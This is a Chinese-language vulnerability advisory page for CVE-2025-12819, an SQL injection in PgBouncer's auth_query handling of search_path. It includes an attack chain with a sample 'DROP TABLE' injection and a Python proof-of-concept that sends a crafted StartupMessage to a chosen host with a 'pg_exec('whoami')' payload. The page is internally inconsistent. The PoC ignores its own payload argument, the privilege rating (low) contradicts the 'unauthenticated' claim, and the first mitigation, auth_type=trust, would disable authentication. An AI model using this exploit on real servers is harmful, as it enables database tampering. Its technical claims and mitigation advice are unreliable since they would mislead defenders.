CVE-2025-12819 PgBouncer 未信任搜索路径SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-12819

漏洞类型

SQL注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

PgBouncer

漏洞概述

CVE-2025-12819是PgBouncer中一个高危SQL注入漏洞，CVSS评分达到7.5分。该漏洞存在于PgBouncer的auth_query连接处理器中，由于使用了未信任的搜索路径（search_path），允许未经身份验证的攻击者在认证过程中通过StartupMessage中的恶意search_path参数执行任意SQL语句。PgBouncer是一个流行的PostgreSQL连接池工具，广泛应用于生产环境中管理数据库连接。该漏洞影响PgBouncer 1.25.1之前的所有版本，攻击者可以利用此漏洞在未提供有效凭证的情况下执行恶意SQL代码，可能导致敏感数据泄露、数据库被篡改或服务中断。由于该漏洞无需用户交互且可远程利用，对暴露在网络中的PgBouncer实例构成严重威胁。建议受影响的用户尽快升级到1.25.1或更高版本以修复此安全漏洞。

技术细节

该漏洞的根本原因在于PgBouncer的auth_query功能处理用户输入的search_path参数时缺乏适当的验证机制。在PostgreSQL认证过程中，客户端可以在StartupMessage中指定search_path参数来设置模式搜索路径。PgBouncer在执行auth_query时直接使用了这个用户可控的参数，而没有进行安全过滤或参数化查询处理。攻击者可以通过构造包含恶意search_path的StartupMessage，在认证阶段注入任意SQL语句。例如，攻击者可以将search_path设置为包含恶意SQL函数调用的形式，当PgBouncer执行auth_query时，这些恶意SQL会被数据库执行。由于auth_query通常以数据库管理员权限运行，攻击者可以获得完整的数据库控制权。漏洞利用的关键在于PgBouncer将用户提供的search_path值直接拼接到SQL查询中，而不是使用参数化查询或白名单机制进行安全处理。

攻击链分析

STEP 1

步骤1

攻击者识别暴露在网络中的PgBouncer实例，通常监听5432端口

STEP 2

步骤2

攻击者构造包含恶意search_path参数的PostgreSQL StartupMessage

STEP 3

步骤3

在search_path参数中注入SQL语句，如'; DROP TABLE users; SELECT...

STEP 4

步骤4

攻击者发送恶意StartupMessage到PgBouncer，无需提供有效凭证

STEP 5

步骤5

PgBouncer的auth_query处理器直接使用未过滤的search_path参数执行SQL

STEP 6

步骤6

恶意SQL在数据库中执行，攻击者实现数据泄露、权限提升或数据篡改

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-12819 PoC - PgBouncer Untrusted Search Path SQL Injection
This PoC demonstrates the SQL injection vulnerability in PgBouncer's auth_query handler.
"""
import socket
import struct

def create_startup_message(client_pid, secret, malicious_search_path):
    """Create a PostgreSQL StartupMessage with malicious search_path"""
    # PostgreSQL protocol version (3.0)
    protocol_version = struct.pack('!I', 196608)
    
    # Build message parameters
    params = b''
    params += b'user\x00postgres\x00'
    params += b'database\x00postgres\x00'
    
    # Malicious search_path injection
    # This injects SQL that creates a malicious function
    injected_sql = f"'; CREATE EXTENSION IF NOT EXISTS pg_exec; SELECT pg_exec('whoami'); '--"
    params += f'search_path\x00{injected_sql}\x00'.encode()
    
    # Calculate message length
    msg = protocol_version + params + b'\x00'
    length = struct.pack('!I', len(msg) + 4)
    
    return length + msg

def send_exploit(target_host, target_port=5432):
    """Send exploit payload to PgBouncer"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    
    try:
        sock.connect((target_host, target_port))
        print(f"[*] Connected to {target_host}:{target_port}")
        
        # Create malicious StartupMessage
        payload = create_startup_message(
            client_pid=1234,
            secret='',
            malicious_search_path="; SELECT 1; --"
        )
        
        print(f"[*] Sending malicious StartupMessage...")
        sock.sendall(payload)
        
        # Wait for response
        try:
            response = sock.recv(4096)
            print(f"[*] Received response: {response[:100]}")
        except socket.timeout:
            print("[*] No response received (may indicate successful injection)")
            
    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        sock.close()

if __name__ == '__main__':
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_host> [target_port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 5432
    send_exploit(target, port)

影响范围

PgBouncer < 1.25.1

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在PgBouncer配置中设置auth_type=trust并禁用auth_query功能；2) 使用防火墙限制对PgBouncer端口的访问，只允许必要的应用服务器IP；3) 在后端PostgreSQL中创建受限的auth_user账户，限制其执行权限；4) 启用PgBouncer的日志记录并监控异常的认证请求；5) 考虑使用VPN或网络隔离来保护数据库连接。